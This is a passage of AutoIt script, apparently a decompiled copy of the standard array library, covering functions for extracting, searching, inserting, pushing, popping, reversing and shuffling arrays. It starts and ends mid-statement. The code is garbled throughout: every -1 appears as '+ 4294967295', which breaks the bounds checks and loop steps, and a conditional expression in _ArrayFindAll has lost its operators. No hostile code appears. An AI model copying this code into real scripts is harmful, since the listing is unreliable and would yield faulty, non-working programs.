$ICW_COLWIDTH + 1 & "s" , STRINGLEFT ($ASPLIT [$J ] , $ICW_COLWIDTH ) ) NEXT ELSE $SITEM = STRINGREPLACE ($SITEM , $SAD_SEPARATOR , $VUSER_SEPARATOR ) ENDIF $SCLIP &= $SITEM & @CRLF NEXT IF $IMSG = $IDCOPY_ID THEN IF $ICW_COLWIDTH THEN $ASPLIT = STRINGSPLIT ($SHEADER , $SAD_SEPARATOR ) $SITEM = "" FOR $J = 1 TO $ASPLIT [0 ] $SITEM &= STRINGFORMAT ("%-" & $ICW_COLWIDTH + 1 & "s" , STRINGLEFT ($ASPLIT [$J ] , $ICW_COLWIDTH ) ) NEXT ELSE $SITEM = STRINGREPLACE ($SHEADER , $SAD_SEPARATOR , $VUSER_SEPARATOR ) ENDIF $SCLIP = $SITEM & @CRLF & $SCLIP ENDIF CLIPPUT ($SCLIP ) SPLASHOFF () GUICTRLSETSTATE ($IDLISTVIEW , $_ARRAYCONSTANT_GUI_FOCUS ) CASE $IDUSER_FUNC LOCAL $AISELITEMS [$IROWLIMIT ] = [0 ] FOR $I = 0 TO GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_GETITEMCOUNT , 0 , 0 ) IF GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_GETITEMSTATE , $I , $_ARRAYCONSTANT_LVIS_SELECTED ) THEN $AISELITEMS [0 ] += 1 $AISELITEMS [$AISELITEMS [0 ] ] = $I + $IITEM_START ENDIF NEXT REDIM $AISELITEMS [$AISELITEMS [0 ] + 1 ] $HUSER_FUNCTION ($AARRAY , $AISELITEMS ) GUICTRLSETSTATE ($IDLISTVIEW , $_ARRAYCONSTANT_GUI_FOCUS ) CASE $IDEXIT_SCRIPT GUIDELETE ($HGUI ) EXIT ENDSWITCH WEND GUIDELETE ($HGUI ) OPT ("GUICoordMode" , $ICOORDMODE ) OPT ("GUIOnEventMode" , $IONEVENTMODE ) OPT ("GUIDataSeparatorChar" , $SCURR_SEPARATOR ) RETURN 1 ENDFUNC FUNC _ARRAYEXTRACT (CONST BYREF $AARRAY , $ISTART_ROW = + 4294967295 , $IEND_ROW = + 4294967295 , $ISTART_COL = + 4294967295 , $IEND_COL = + 4294967295 ) IF $ISTART_ROW = DEFAULT THEN $ISTART_ROW = + 4294967295 IF $IEND_ROW = DEFAULT THEN $IEND_ROW = + 4294967295 IF $ISTART_COL = DEFAULT THEN $ISTART_COL = + 4294967295 IF $IEND_COL = DEFAULT THEN $IEND_COL = + 4294967295 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 IF $IEND_ROW = + 4294967295 THEN $IEND_ROW = $IDIM_1 IF $ISTART_ROW = + 4294967295 THEN $ISTART_ROW = 0 IF $ISTART_ROW < + 4294967295 OR $IEND_ROW < + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART_ROW > $IDIM_1 OR $IEND_ROW > $IDIM_1 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART_ROW > $IEND_ROW THEN RETURN SETERROR (4 , 0 , + 4294967295 ) SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 LOCAL $ARETARRAY [$IEND_ROW - $ISTART_ROW + 1 ] FOR $I = 0 TO $IEND_ROW - $ISTART_ROW $ARETARRAY [$I ] = $AARRAY [$I + $ISTART_ROW ] NEXT RETURN $ARETARRAY CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $IEND_COL = + 4294967295 THEN $IEND_COL = $IDIM_2 IF $ISTART_COL = + 4294967295 THEN $ISTART_COL = 0 IF $ISTART_COL < + 4294967295 OR $IEND_COL < + 4294967295 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $ISTART_COL > $IDIM_2 OR $IEND_COL > $IDIM_2 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $ISTART_COL > $IEND_COL THEN RETURN SETERROR (6 , 0 , + 4294967295 ) IF $ISTART_COL = $IEND_COL THEN LOCAL $ARETARRAY [$IEND_ROW - $ISTART_ROW + 1 ] ELSE LOCAL $ARETARRAY [$IEND_ROW - $ISTART_ROW + 1 ] [$IEND_COL - $ISTART_COL + 1 ] ENDIF FOR $I = 0 TO $IEND_ROW - $ISTART_ROW FOR $J = 0 TO $IEND_COL - $ISTART_COL IF $ISTART_COL = $IEND_COL THEN $ARETARRAY [$I ] = $AARRAY [$I + $ISTART_ROW ] [$J + $ISTART_COL ] ELSE $ARETARRAY [$I ] [$J ] = $AARRAY [$I + $ISTART_ROW ] [$J + $ISTART_COL ] ENDIF NEXT NEXT RETURN $ARETARRAY CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN 1 ENDFUNC FUNC _ARRAYFINDALL (CONST BYREF $AARRAY , $VVALUE , $ISTART = 0 , $IEND = 0 , $ICASE = 0 , $ICOMPARE = 0 , $ISUBITEM = 0 , $BROW = FALSE ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ICASE = DEFAULT THEN $ICASE = 0 IF $ICOMPARE = DEFAULT THEN $ICOMPARE = 0 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 IF $BROW = DEFAULT THEN $BROW = FALSE $ISTART = _ARRAYSEARCH ($AARRAY , $VVALUE , $ISTART , $IEND , $ICASE , $ICOMPARE , 1 , $ISUBITEM , $BROW ) IF @ERROR THEN RETURN SETERROR (@ERROR , 0 , + 4294967295 ) LOCAL $IINDEX = 0 , $AVRESULT [UBOUND ($AARRAY , ($BROW $UBOUND_COLUMNS $UBOUND_ROWS ) ) ] DO $AVRESULT [$IINDEX ] = $ISTART $IINDEX += 1 $ISTART = _ARRAYSEARCH ($AARRAY , $VVALUE , $ISTART + 1 , $IEND , $ICASE , $ICOMPARE , 1 , $ISUBITEM , $BROW ) UNTIL @ERROR REDIM $AVRESULT [$IINDEX ] RETURN $AVRESULT ENDFUNC FUNC _ARRAYINSERT (BYREF $AARRAY , $VRANGE , $VVALUE = "" , $ISTART = 0 , $SDELIM_ITEM = "|" , $SDELIM_ROW = @CRLF , $IFORCE = $ARRAYFILL_FORCE_DEFAULT ) IF $VVALUE = DEFAULT THEN $VVALUE = "" IF $ISTART = DEFAULT THEN $ISTART = 0 IF $SDELIM_ITEM = DEFAULT THEN $SDELIM_ITEM = "|" IF $SDELIM_ROW = DEFAULT THEN $SDELIM_ROW = @CRLF IF $IFORCE = DEFAULT THEN $IFORCE = $ARRAYFILL_FORCE_DEFAULT IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 LOCAL $HDATATYPE = 0 SWITCH $IFORCE CASE $ARRAYFILL_FORCE_INT $HDATATYPE = INT CASE $ARRAYFILL_FORCE_NUMBER $HDATATYPE = NUMBER CASE $ARRAYFILL_FORCE_PTR $HDATATYPE = PTR CASE $ARRAYFILL_FORCE_HWND $HDATATYPE = HWND CASE $ARRAYFILL_FORCE_STRING $HDATATYPE = STRING ENDSWITCH LOCAL $ASPLIT_1 , $ASPLIT_2 IF ISARRAY ($VRANGE ) THEN IF UBOUND ($VRANGE , $UBOUND_DIMENSIONS ) <> 1 OR UBOUND ($VRANGE , $UBOUND_ROWS ) < 2 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) ELSE LOCAL $INUMBER $VRANGE = STRINGSTRIPWS ($VRANGE , 8 ) $ASPLIT_1 = STRINGSPLIT ($VRANGE , ";" ) $VRANGE = "" FOR $I = 1 TO $ASPLIT_1 [0 ] IF NOT STRINGREGEXP ($ASPLIT_1 [$I ] , "^\d+(-\d+)?$" ) THEN RETURN SETERROR (3 , 0 , + 4294967295 ) $ASPLIT_2 = STRINGSPLIT ($ASPLIT_1 [$I ] , "-" ) SWITCH $ASPLIT_2 [0 ] CASE 1 $VRANGE &= $ASPLIT_2 [1 ] & ";" CASE 2 IF NUMBER ($ASPLIT_2 [2 ] ) >= NUMBER ($ASPLIT_2 [1 ] ) THEN $INUMBER = $ASPLIT_2 [1 ] + 4294967295 DO $INUMBER += 1 $VRANGE &= $INUMBER & ";" UNTIL $INUMBER = $ASPLIT_2 [2 ] ENDIF ENDSWITCH NEXT $VRANGE = STRINGSPLIT (STRINGTRIMRIGHT ($VRANGE , 1 ) , ";" ) ENDIF IF $VRANGE [1 ] < 0 OR $VRANGE [$VRANGE [0 ] ] > $IDIM_1 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) FOR $I = 2 TO $VRANGE [0 ] IF $VRANGE [$I ] < $VRANGE [$I + 4294967295 ] THEN RETURN SETERROR (3 , 0 , + 4294967295 ) NEXT LOCAL $ICOPYTO_INDEX = $IDIM_1 + $VRANGE [0 ] LOCAL $IINSERTPOINT_INDEX = $VRANGE [0 ] LOCAL $IINSERT_INDEX = $VRANGE [$IINSERTPOINT_INDEX ] SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $IFORCE = $ARRAYFILL_FORCE_SINGLEITEM THEN REDIM $AARRAY [$IDIM_1 + $VRANGE [0 ] + 1 ] FOR $IREADFROMINDEX = $IDIM_1 TO 0 STEP + 4294967295 $AARRAY [$ICOPYTO_INDEX ] = $AARRAY [$IREADFROMINDEX ] $ICOPYTO_INDEX -= 1 $IINSERT_INDEX = $VRANGE [$IINSERTPOINT_INDEX ] WHILE $IREADFROMINDEX = $IINSERT_INDEX $AARRAY [$ICOPYTO_INDEX ] = $VVALUE $ICOPYTO_INDEX -= 1 $IINSERTPOINT_INDEX -= 1 IF $IINSERTPOINT_INDEX < 1 THEN EXITLOOP 2 $IINSERT_INDEX = $VRANGE [$IINSERTPOINT_INDEX ] WEND NEXT RETURN $IDIM_1 + $VRANGE [0 ] + 1 ENDIF REDIM $AARRAY [$IDIM_1 + $VRANGE [0 ] + 1 ] IF ISARRAY ($VVALUE ) THEN IF UBOUND ($VVALUE , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) $HDATATYPE = 0 ELSE LOCAL $ATMP = STRINGSPLIT ($VVALUE , $SDELIM_ITEM , $STR_NOCOUNT + $STR_ENTIRESPLIT ) IF UBOUND ($ATMP , $UBOUND_ROWS ) = 1 THEN $ATMP [0 ] = $VVALUE $HDATATYPE = 0 ENDIF $VVALUE = $ATMP ENDIF FOR $IREADFROMINDEX = $IDIM_1 TO 0 STEP + 4294967295 $AARRAY [$ICOPYTO_INDEX ] = $AARRAY [$IREADFROMINDEX ] $ICOPYTO_INDEX -= 1 $IINSERT_INDEX = $VRANGE [$IINSERTPOINT_INDEX ] WHILE $IREADFROMINDEX = $IINSERT_INDEX IF $IINSERTPOINT_INDEX <= UBOUND ($VVALUE , $UBOUND_ROWS ) THEN IF ISFUNC ($HDATATYPE ) THEN $AARRAY [$ICOPYTO_INDEX ] = $HDATATYPE ($VVALUE [$IINSERTPOINT_INDEX + 4294967295 ] ) ELSE $AARRAY [$ICOPYTO_INDEX ] = $VVALUE [$IINSERTPOINT_INDEX + 4294967295 ] ENDIF ELSE $AARRAY [$ICOPYTO_INDEX ] = "" ENDIF $ICOPYTO_INDEX -= 1 $IINSERTPOINT_INDEX -= 1 IF $IINSERTPOINT_INDEX = 0 THEN EXITLOOP 2 $IINSERT_INDEX = $VRANGE [$IINSERTPOINT_INDEX ] WEND NEXT CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $ISTART < 0 OR $ISTART > $IDIM_2 + 4294967295 THEN RETURN SETERROR (6 , 0 , + 4294967295 ) LOCAL $IVALDIM_1 , $IVALDIM_2 IF ISARRAY ($VVALUE ) THEN IF UBOUND ($VVALUE , $UBOUND_DIMENSIONS ) <> 2 THEN RETURN SETERROR (7 , 0 , + 4294967295 ) $IVALDIM_1 = UBOUND ($VVALUE , $UBOUND_ROWS ) $IVALDIM_2 = UBOUND ($VVALUE , $UBOUND_COLUMNS ) $HDATATYPE = 0 ELSE $ASPLIT_1 = STRINGSPLIT ($VVALUE , $SDELIM_ROW , $STR_NOCOUNT + $STR_ENTIRESPLIT ) $IVALDIM_1 = UBOUND ($ASPLIT_1 , $UBOUND_ROWS ) STRINGREPLACE ($ASPLIT_1 [0 ] , $SDELIM_ITEM , "" ) $IVALDIM_2 = @EXTENDED + 1 LOCAL $ATMP [$IVALDIM_1 ] [$IVALDIM_2 ] FOR $I = 0 TO $IVALDIM_1 + 4294967295 $ASPLIT_2 = STRINGSPLIT ($ASPLIT_1 [$I ] , $SDELIM_ITEM , $STR_NOCOUNT + $STR_ENTIRESPLIT ) FOR $J = 0 TO $IVALDIM_2 + 4294967295 $ATMP [$I ] [$J ] = $ASPLIT_2 [$J ] NEXT NEXT $VVALUE = $ATMP ENDIF IF UBOUND ($VVALUE , $UBOUND_COLUMNS ) + $ISTART > UBOUND ($AARRAY , $UBOUND_COLUMNS ) THEN RETURN SETERROR (8 , 0 , + 4294967295 ) REDIM $AARRAY [$IDIM_1 + $VRANGE [0 ] + 1 ] [$IDIM_2 ] FOR $IREADFROMINDEX = $IDIM_1 TO 0 STEP + 4294967295 FOR $J = 0 TO $IDIM_2 + 4294967295 $AARRAY [$ICOPYTO_INDEX ] [$J ] = $AARRAY [$IREADFROMINDEX ] [$J ] NEXT $ICOPYTO_INDEX -= 1 $IINSERT_INDEX = $VRANGE [$IINSERTPOINT_INDEX ] WHILE $IREADFROMINDEX = $IINSERT_INDEX FOR $J = 0 TO $IDIM_2 + 4294967295 IF $J < $ISTART THEN $AARRAY [$ICOPYTO_INDEX ] [$J ] = "" ELSEIF $J - $ISTART > $IVALDIM_2 + 4294967295 THEN $AARRAY [$ICOPYTO_INDEX ] [$J ] = "" ELSE IF $IINSERTPOINT_INDEX + 4294967295 < $IVALDIM_1 THEN IF ISFUNC ($HDATATYPE ) THEN $AARRAY [$ICOPYTO_INDEX ] [$J ] = $HDATATYPE ($VVALUE [$IINSERTPOINT_INDEX + 4294967295 ] [$J - $ISTART ] ) ELSE $AARRAY [$ICOPYTO_INDEX ] [$J ] = $VVALUE [$IINSERTPOINT_INDEX + 4294967295 ] [$J - $ISTART ] ENDIF ELSE $AARRAY [$ICOPYTO_INDEX ] [$J ] = "" ENDIF ENDIF NEXT $ICOPYTO_INDEX -= 1 $IINSERTPOINT_INDEX -= 1 IF $IINSERTPOINT_INDEX = 0 THEN EXITLOOP 2 $IINSERT_INDEX = $VRANGE [$IINSERTPOINT_INDEX ] WEND NEXT CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_ROWS ) ENDFUNC FUNC _ARRAYMAX (CONST BYREF $AARRAY , $ICOMPNUMERIC = 0 , $ISTART = + 4294967295 , $IEND = + 4294967295 , $ISUBITEM = 0 ) LOCAL $IRESULT = _ARRAYMAXINDEX ($AARRAY , $ICOMPNUMERIC , $ISTART , $IEND , $ISUBITEM ) IF @ERROR THEN RETURN SETERROR (@ERROR , 0 , "" ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) = 1 THEN RETURN $AARRAY [$IRESULT ] ELSE RETURN $AARRAY [$IRESULT ] [$ISUBITEM ] ENDIF ENDFUNC FUNC _ARRAYMAXINDEX (CONST BYREF $AARRAY , $ICOMPNUMERIC = 0 , $ISTART = + 4294967295 , $IEND = + 4294967295 , $ISUBITEM = 0 ) IF $ICOMPNUMERIC = DEFAULT THEN $ICOMPNUMERIC = 0 IF $ISTART = DEFAULT THEN $ISTART = + 4294967295 IF $IEND = DEFAULT THEN $IEND = + 4294967295 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 LOCAL $IRET = __ARRAY_MINMAXINDEX ($AARRAY , $ICOMPNUMERIC , $ISTART , $IEND , $ISUBITEM , __ARRAY_GREATERTHAN ) RETURN SETERROR (@ERROR , 0 , $IRET ) ENDFUNC FUNC _ARRAYMIN (CONST BYREF $AARRAY , $ICOMPNUMERIC = 0 , $ISTART = + 4294967295 , $IEND = + 4294967295 , $ISUBITEM = 0 ) LOCAL $IRESULT = _ARRAYMININDEX ($AARRAY , $ICOMPNUMERIC , $ISTART , $IEND , $ISUBITEM ) IF @ERROR THEN RETURN SETERROR (@ERROR , 0 , "" ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) = 1 THEN RETURN $AARRAY [$IRESULT ] ELSE RETURN $AARRAY [$IRESULT ] [$ISUBITEM ] ENDIF ENDFUNC FUNC _ARRAYMININDEX (CONST BYREF $AARRAY , $ICOMPNUMERIC = 0 , $ISTART = + 4294967295 , $IEND = + 4294967295 , $ISUBITEM = 0 ) IF $ICOMPNUMERIC = DEFAULT THEN $ICOMPNUMERIC = 0 IF $ISTART = DEFAULT THEN $ISTART = + 4294967295 IF $IEND = DEFAULT THEN $IEND = + 4294967295 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 LOCAL $IRET = __ARRAY_MINMAXINDEX ($AARRAY , $ICOMPNUMERIC , $ISTART , $IEND , $ISUBITEM , __ARRAY_LESSTHAN ) RETURN SETERROR (@ERROR , 0 , $IRET ) ENDFUNC FUNC _ARRAYPERMUTE (BYREF $AARRAY , $SDELIMITER = "" ) IF $SDELIMITER = DEFAULT THEN $SDELIMITER = "" IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , 0 ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (2 , 0 , 0 ) LOCAL $ISIZE = UBOUND ($AARRAY ) , $IFACTORIAL = 1 , $AIDX [$ISIZE ] , $ARESULT [1 ] , $ICOUNT = 1 IF UBOUND ($AARRAY ) THEN FOR $I = 0 TO $ISIZE + 4294967295 $AIDX [$I ] = $I NEXT FOR $I = $ISIZE TO 1 STEP + 4294967295 $IFACTORIAL *= $I NEXT REDIM $ARESULT [$IFACTORIAL + 1 ] $ARESULT [0 ] = $IFACTORIAL __ARRAY_EXETERINTERNAL ($AARRAY , 0 , $ISIZE , $SDELIMITER , $AIDX , $ARESULT , $ICOUNT ) ELSE $ARESULT [0 ] = 0 ENDIF RETURN $ARESULT ENDFUNC FUNC _ARRAYPOP (BYREF $AARRAY ) IF (NOT ISARRAY ($AARRAY ) ) THEN RETURN SETERROR (1 , 0 , "" ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (2 , 0 , "" ) LOCAL $IUBOUND = UBOUND ($AARRAY ) + 4294967295 IF $IUBOUND = + 4294967295 THEN RETURN SETERROR (3 , 0 , "" ) LOCAL $SLASTVAL = $AARRAY [$IUBOUND ] IF $IUBOUND > + 4294967295 THEN REDIM $AARRAY [$IUBOUND ] ENDIF RETURN $SLASTVAL ENDFUNC FUNC _ARRAYPUSH (BYREF $AARRAY , $VVALUE , $IDIRECTION = 0 ) IF $IDIRECTION = DEFAULT THEN $IDIRECTION = 0 IF (NOT ISARRAY ($AARRAY ) ) THEN RETURN SETERROR (1 , 0 , 0 ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (3 , 0 , 0 ) LOCAL $IUBOUND = UBOUND ($AARRAY ) + 4294967295 IF ISARRAY ($VVALUE ) THEN LOCAL $IUBOUNDS = UBOUND ($VVALUE ) IF ($IUBOUNDS + 4294967295 ) > $IUBOUND THEN RETURN SETERROR (2 , 0 , 0 ) IF $IDIRECTION THEN FOR $I = $IUBOUND TO $IUBOUNDS STEP + 4294967295 $AARRAY [$I ] = $AARRAY [$I - $IUBOUNDS ] NEXT FOR $I = 0 TO $IUBOUNDS + 4294967295 $AARRAY [$I ] = $VVALUE [$I ] NEXT ELSE FOR $I = 0 TO $IUBOUND - $IUBOUNDS $AARRAY [$I ] = $AARRAY [$I + $IUBOUNDS ] NEXT FOR $I = 0 TO $IUBOUNDS + 4294967295 $AARRAY [$I + $IUBOUND - $IUBOUNDS + 1 ] = $VVALUE [$I ] NEXT ENDIF ELSE IF $IUBOUND > + 4294967295 THEN IF $IDIRECTION THEN FOR $I = $IUBOUND TO 1 STEP + 4294967295 $AARRAY [$I ] = $AARRAY [$I + 4294967295 ] NEXT $AARRAY [0 ] = $VVALUE ELSE FOR $I = 0 TO $IUBOUND + 4294967295 $AARRAY [$I ] = $AARRAY [$I + 1 ] NEXT $AARRAY [$IUBOUND ] = $VVALUE ENDIF ENDIF ENDIF RETURN 1 ENDFUNC FUNC _ARRAYREVERSE (BYREF $AARRAY , $ISTART = 0 , $IEND = 0 ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , 0 ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (3 , 0 , 0 ) IF NOT UBOUND ($AARRAY ) THEN RETURN SETERROR (4 , 0 , 0 ) LOCAL $VTMP , $IUBOUND = UBOUND ($AARRAY ) + 4294967295 IF $IEND < 1 OR $IEND > $IUBOUND THEN $IEND = $IUBOUND IF $ISTART < 0 THEN $ISTART = 0 IF $ISTART > $IEND THEN RETURN SETERROR (2 , 0 , 0 ) FOR $I = $ISTART TO INT (($ISTART + $IEND + 4294967295 ) / 2 ) $VTMP = $AARRAY [$I ] $AARRAY [$I ] = $AARRAY [$IEND ] $AARRAY [$IEND ] = $VTMP $IEND -= 1 NEXT RETURN 1 ENDFUNC FUNC _ARRAYSEARCH (CONST BYREF $AARRAY , $VVALUE , $ISTART = 0 , $IEND = 0 , $ICASE = 0 , $ICOMPARE = 0 , $IFORWARD = 1 , $ISUBITEM = + 4294967295 , $BROW = FALSE ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ICASE = DEFAULT THEN $ICASE = 0 IF $ICOMPARE = DEFAULT THEN $ICOMPARE = 0 IF $IFORWARD = DEFAULT THEN $IFORWARD = 1 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = + 4294967295 IF $BROW = DEFAULT THEN $BROW = FALSE IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY ) + 4294967295 IF $IDIM_1 = + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 LOCAL $BCOMPTYPE = FALSE IF $ICOMPARE = 2 THEN $ICOMPARE = 0 $BCOMPTYPE = TRUE ENDIF IF $BROW THEN IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) = 1 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $IEND < 1 OR $IEND > $IDIM_2 THEN $IEND = $IDIM_2 IF $ISTART < 0 THEN $ISTART = 0 IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) ELSE IF $IEND < 1 OR $IEND > $IDIM_1 THEN $IEND = $IDIM_1 IF $ISTART < 0 THEN $ISTART = 0 IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) ENDIF LOCAL $ISTEP = 1 IF NOT $IFORWARD THEN LOCAL $ITMP = $ISTART $ISTART = $IEND $IEND = $ITMP $ISTEP = + 4294967295 ENDIF SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF NOT $ICOMPARE THEN IF NOT $ICASE THEN FOR $I = $ISTART TO $IEND STEP $ISTEP IF $BCOMPTYPE AND VARGETTYPE ($AARRAY [$I ] ) <> VARGETTYPE ($VVALUE ) THEN CONTINUELOOP IF $AARRAY [$I ] = $VVALUE THEN RETURN $I NEXT ELSE FOR $I = $ISTART TO $IEND STEP $ISTEP IF $BCOMPTYPE AND VARGETTYPE ($AARRAY [$I ] ) <> VARGETTYPE ($VVALUE ) THEN CONTINUELOOP IF $AARRAY [$I ] == $VVALUE THEN RETURN $I NEXT ENDIF ELSE FOR $I = $ISTART TO $IEND STEP $ISTEP IF $ICOMPARE = 3 THEN IF STRINGREGEXP ($AARRAY [$I ] , $VVALUE ) THEN RETURN $I ELSE IF STRINGINSTR ($AARRAY [$I ] , $VVALUE , $ICASE ) > 0 THEN RETURN $I ENDIF NEXT ENDIF CASE 2 LOCAL $IDIM_SUB IF $BROW THEN $IDIM_SUB = $IDIM_1 IF $ISUBITEM > $IDIM_SUB THEN $ISUBITEM = $IDIM_SUB IF $ISUBITEM < 0 THEN $ISUBITEM = 0 ELSE $IDIM_SUB = $ISUBITEM ENDIF ELSE $IDIM_SUB = $IDIM_2 IF $ISUBITEM > $IDIM_SUB THEN $ISUBITEM = $IDIM_SUB IF $ISUBITEM < 0 THEN $ISUBITEM = 0 ELSE $IDIM_SUB = $ISUBITEM ENDIF ENDIF FOR $J = $ISUBITEM TO $IDIM_SUB IF NOT $ICOMPARE THEN IF NOT $ICASE THEN FOR $I = $ISTART TO $IEND STEP $ISTEP IF $BROW THEN IF $BCOMPTYPE AND VARGETTYPE ($AARRAY [$J ] [$J ] ) <> VARGETTYPE ($VVALUE ) THEN CONTINUELOOP IF $AARRAY [$J ] [$I ] = $VVALUE THEN RETURN $I ELSE IF $BCOMPTYPE AND VARGETTYPE ($AARRAY [$I ] [$J ] ) <> VARGETTYPE ($VVALUE ) THEN CONTINUELOOP IF $AARRAY [$I ] [$J ] = $VVALUE THEN RETURN $I ENDIF NEXT ELSE FOR $I = $ISTART TO $IEND STEP $ISTEP IF $BROW THEN IF $BCOMPTYPE AND VARGETTYPE ($AARRAY [$J ] [$I ] ) <> VARGETTYPE ($VVALUE ) THEN CONTINUELOOP IF $AARRAY [$J ] [$I ] == $VVALUE THEN RETURN $I ELSE IF $BCOMPTYPE AND VARGETTYPE ($AARRAY [$I ] [$J ] ) <> VARGETTYPE ($VVALUE ) THEN CONTINUELOOP IF $AARRAY [$I ] [$J ] == $VVALUE THEN RETURN $I ENDIF NEXT ENDIF ELSE FOR $I = $ISTART TO $IEND STEP $ISTEP IF $ICOMPARE = 3 THEN IF $BROW THEN IF STRINGREGEXP ($AARRAY [$J ] [$I ] , $VVALUE ) THEN RETURN $I ELSE IF STRINGREGEXP ($AARRAY [$I ] [$J ] , $VVALUE ) THEN RETURN $I ENDIF ELSE IF $BROW THEN IF STRINGINSTR ($AARRAY [$J ] [$I ] , $VVALUE , $ICASE ) > 0 THEN RETURN $I ELSE IF STRINGINSTR ($AARRAY [$I ] [$J ] , $VVALUE , $ICASE ) > 0 THEN RETURN $I ENDIF ENDIF NEXT ENDIF NEXT CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN SETERROR (6 , 0 , + 4294967295 ) ENDFUNC FUNC _ARRAYSHUFFLE (BYREF $AARRAY , $ISTART_ROW = 0 , $IEND_ROW = 0 , $ICOL = + 4294967295 ) IF $ISTART_ROW = DEFAULT THEN $ISTART_ROW = 0 IF $IEND_ROW = DEFAULT THEN $IEND_ROW = 0 IF $ICOL = DEFAULT THEN $ICOL = + 4294967295 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) IF $IEND_ROW = 0 THEN $IEND_ROW = $IDIM_1 + 4294967295 IF $ISTART_ROW < 0 OR $ISTART_ROW > $IDIM_1 + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $IEND_ROW < 1 OR $IEND_ROW > $IDIM_1 + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART_ROW > $IEND_ROW THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $VTMP , $IRAND SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 FOR $I = $IEND_ROW TO $ISTART_ROW + 1 STEP + 4294967295 $IRAND = RANDOM ($ISTART_ROW , $I , 1 ) $VTMP = $AARRAY [$I ] $AARRAY [$I ] = $AARRAY [$IRAND ] $AARRAY [$IRAND ] = $VTMP NEXT RETURN 1 CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $ICOL < + 4294967295 OR $ICOL > $IDIM_2 + 4294967295 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) LOCAL $ICOL_START , $ICOL_END IF $ICOL = + 4294967295 THEN $ICOL_START = 0 $ICOL_END = $IDIM_2 + 4294967295 ELSE $ICOL_START = $ICOL $ICOL_END = $ICOL ENDIF FOR $I = $IEND_ROW TO $ISTART_ROW + 1 STEP + 4294967295 $IRAND = RANDOM ($ISTART_ROW , $I , 1 ) FOR $J = $ICOL_START TO $ICOL_END $VTMP = $AARRAY [$I ] [$J ] $AARRAY [$I ] [$J ] = $AARRAY [$IRAND ] [$J ] $AARRAY [$IRAND ] [$J ] = $VTMP NEXT NEXT RETURN 1 CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH ENDFUNC FUNC _ARRAYSORT (BYREF $AARRAY , $IDESCENDING = 0 , $ISTART = 0 , $IEND = 0 , $ISUBITEM = 0 , $IPIVOT = 0 ) IF $IDESCENDING = DEFAULT THEN $IDESCENDING = 0 IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 IF $IPIVOT = DEFAULT THEN $IPIVOT = 0 IF NOT 